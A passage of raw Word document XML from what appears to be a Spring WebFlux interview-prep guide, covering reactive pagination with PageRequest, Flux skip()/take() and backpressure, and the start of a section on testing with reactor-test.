    <w:p w14:paraId="17D59CB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78EA5B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51C010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3843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extend ReactiveCrudRepository and use Pageable (or a custom query).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199443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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ED9C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1ABE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5BCCAA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reactor.core.publisher.Flux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C16252" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E5DA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6AFE29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3380F7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593A61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Service Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C57827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 define methods to retrieve paginated data by accepting parameters like page and size. Convert these into a PageRequest object for pagination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04340A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B9628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A9DD2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3913F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64F42B0" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59BE4B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7475A1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FBB798B" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3632BB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535FC1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B8EF58A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566E5EC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3373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57AA0CE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31BF0E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94AC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A07B33"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troller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A321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accept pagination parameters (page, size) from the request and pass them to the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574CF52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64A0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57B5E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8E91582" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00EAF4B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0BAFE2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0B5DB3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4BA6B9BF" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5630B1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08D3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EAE4C26" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FAC2AA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6AECB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15600A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206E72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4818960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240B2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1C4D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the Pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DF35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test pagination by calling the REST API with page and size parameters. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350FD5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3B882F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quest will fetch the first page of 10 items.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72876215"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Pagination Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAC6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return specific fields along with pagination details (like total number of pages), you can create a custom response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B14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ustom Pagination Response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7B2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agedResponse&lt;T&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F125E7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lux&lt;T&gt; content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBFF7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totalElements;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157DD0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totalPages;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE24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currentPage;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BCD644" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3474CC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 getters, and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD6A7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DD8D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F59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E8E4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F25F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446F66A" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51680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E0D44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E1A9E0D" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2E44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FF451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4AF4F076" w14:textId="77777777" w:rsidR="00C201B0" w:rsidRPr="00B13F85" w:rsidRDefault="00C201B0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B9B7A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agedResponse&lt;Item&gt;&gt; getItemsWithPagination(int page, int size) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC78B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4E3569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s = itemRepository.findAllBy(pageRequest);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721DDC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collectList()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9926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list -&gt; new PagedResponse&lt;&gt;(Flux.fromIterable(list), list.size(), pageRequest.getPageSize(), page));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545F37F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F27FB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A04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sponse would return the data along with additional pagination details such as total elements and total pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261BCF2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Handling Pagination for Large Datasets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7F5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you’re managing the backpressure properly, especially for larger datasets. You can use operators like skip() and take() to limit the number of records being fetched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4184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17B3B52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643897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A11E0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE18C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C578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9E5B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can work if you’re not using a database-specific pagination method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51269C2C"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CFBAD0">
          <v:rect id="_x0000_i2328" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51421E9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Key Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BB8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geRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use PageRequest.of(page, size) to create pagination requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFE1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pository</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Make sure your repository supports pagination by accepting PageRequest in methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA8CA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ice Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handle pagination logic in the service layer, converting parameters into a PageRequest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F79D6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troller Layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Accept page and size parameters in the REST API and pass them to the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40278C4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following this approach, you can implement efficient and scalable pagination in a reactive Spring WebFlux application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A82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329" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="365B9FBF" w14:textId="5A7E7D8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0" w:name="_Toc197867754"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you paginate large datasets using Mono or Flux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="540"/>
    </w:p>
    <w:p w14:paraId="6E1B3553" w14:textId="52D62BB8" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A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paginate large datasets using Mono or Flux in a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 you will typically rely on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for large datasets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CD153"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Paginate Large Datasets Using Mono or Flux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65973950"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e Reactive Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757E9B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the repository method must return a Flux (for multiple items) or Mono (for single item) of data. We can use Pageable for MongoDB or PageRequest in general to handle pagination in the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153112E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MongoDB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AF74D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64227A8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19C2804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5BF0BD6" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3602D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3C187D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12A2C1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E3BA3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R2DBC (Reactive Relational DB):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236B58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683E3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65C32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A1741B8" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3940D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081021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6DE096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C0B64AE"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ervice Layer for Paginated Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C224B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280EC95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4EC60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B10CA7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E335C9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37308C2" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F23CB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B41C85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5B03E5F" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0555B14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7DF6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263E8C6" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE5D5B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ethod for fetching paginated items using Mono or Flux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5544828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405065F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67645D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1074BCA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75D4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64C0D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ontroller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4773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layer, you will pass the page and size from the request query parameters to the service method, and return the paginated data using Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C238BE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BA705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D746A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6197558" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09B791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25A8D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6E4007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33F22C19" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C927945"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43432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1731498" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06E9C94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ndpoint to fetch paginated data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAD2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2BB033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B7731A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56B93B0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1B1B119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87F1D6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F97FE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 this, a request like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE73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70B2A07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ill return the first page of items with a size of 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC3E79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Backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998D3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dealing with large datasets, you must also consider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hich ensures the system doesn’t overwhelm the client or server by sending too much data at once. Spring WebFlux handles backpressure natively with Mono and Flux by applying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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E6F28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ensures that the client only receives the amount of data they can handle at any time, thus preventing memory overflows and improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F2B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also use operators like skip() and take() for pagination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E89B01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333639C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4252664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 // Skip items from previous pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A5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              // Limit to the page size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697F10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AADCA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ay, even if you don't use database-native pagination features, you can still paginate large datasets using the Flux stream by managing the flow of data with skip() and take().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D89E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ptimizing Large Dataset Fetching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1409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it's crucial to avoid loading the entire dataset into memory at once. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pagination</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the database query level, which returns only the required subset of records, and process them asynchronously with Mono and Flux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B786FA5"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Using Mono for a Single Item with Pagination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665FF80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Item&gt; getItemById(String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFD8AC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  // Returns a Mono of Item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC10C2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BFBAED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pagination, this could work for scenarios where you need to fetch items one by one with Mono responses after applying pagination on each request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416F98A4" w14:textId="77777777" w:rsidR="00550A8E"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C81D5C">
          <v:rect id="_x0000_i2330" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="713FB54D"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lete Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B302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nd-to-end example combining all the steps for paginating large datasets using Flux and Mono in a Spring WebFlux application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12121DD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omain Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1039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7577960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07C4B5A3" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2078EF2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5A7C7DB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4EEE2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B67508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158A35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237ED0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668CFE55" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A05E6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Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5B803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452CF9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pository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F1C4B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611589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245599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989A9AE" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013F2CD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6FA6EEA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721EFE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A13549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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2141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E9259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15337D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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609313B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5684C0B" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D39FF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50943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4F6CA156" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="157639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7399498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AA7D494" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739325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F195DF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3B370A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49A1540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209D4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3F853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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE74F1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76D1648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5A0AFDC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2B616F3" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9B64C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72ED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94CDF8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6528D7D9" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AED7F7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43EE33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B9EEA93" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00B13F85" w:rsidRDefault="00550A8E" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A99FB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050099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98C18F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3EA721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2CAD22E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20F6E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AD910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2DA0A1F7" w14:textId="77777777" w:rsidR="00550A8E" w:rsidRPr="00CE4B95" w:rsidRDefault="00550A8E"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331" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC138C1" w14:textId="4E0416A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1" w:name="_Toc197867755"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how you would test a reactive Spring WebFlux service</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>
    </w:p>
    <w:p w14:paraId="1194C8BE" w14:textId="5D910921" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C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a reactiv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tep-by-step guide on how you would test a reactive Spring WebFlux service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446B67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Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D2BDC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ke sure you include the necessary dependencies for Spring WebFlux testing. The key dependencies include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC797A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test (for general testing support)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661258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webflux (for Spring WebFlux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CDC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or-test (for testing reactive streams like Mono and Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50A95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437C8D2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1C3ED26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311A81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60EF7A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5E4B1B4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02625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281393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test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027D99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scope&gt;test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27637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EAE081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657A17A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projectreactor&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB2B3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eactor-test&lt;/artifactId&gt;</w:t>
      </w:r>
